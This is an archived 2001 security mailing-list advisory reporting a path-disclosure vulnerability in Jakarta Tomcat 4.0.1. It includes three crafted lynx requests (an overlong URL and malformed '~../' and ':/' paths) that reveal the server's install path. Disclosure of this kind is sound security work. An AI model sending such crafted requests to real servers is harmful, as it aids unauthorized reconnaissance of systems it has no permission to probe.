Hello, It looks like jakarta-tomcat-4.0.1 has a path revealing vulnerability. On submiting an unusually long request(more than 222 bites) or a special crafted request, we can get the web server's install path. How to produce it ---------------------- $ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp $ lynx http://localhost:8080/:/x.jsp $ lynx http://localhost:8080/~../x.jsp Tested version ----------------------- Jakarta Tomcat v4.0.1 Microsoft Windows 2000 I sent this information to the vendor a week ago, but i have not received any reply!:( Best Regards analysistat_private NSFOCUS Security Team <http://www.nsfocus.com>
This archive was generated by hypermail 2b30 : Fri Nov 23 2001 - 14:37:23 PST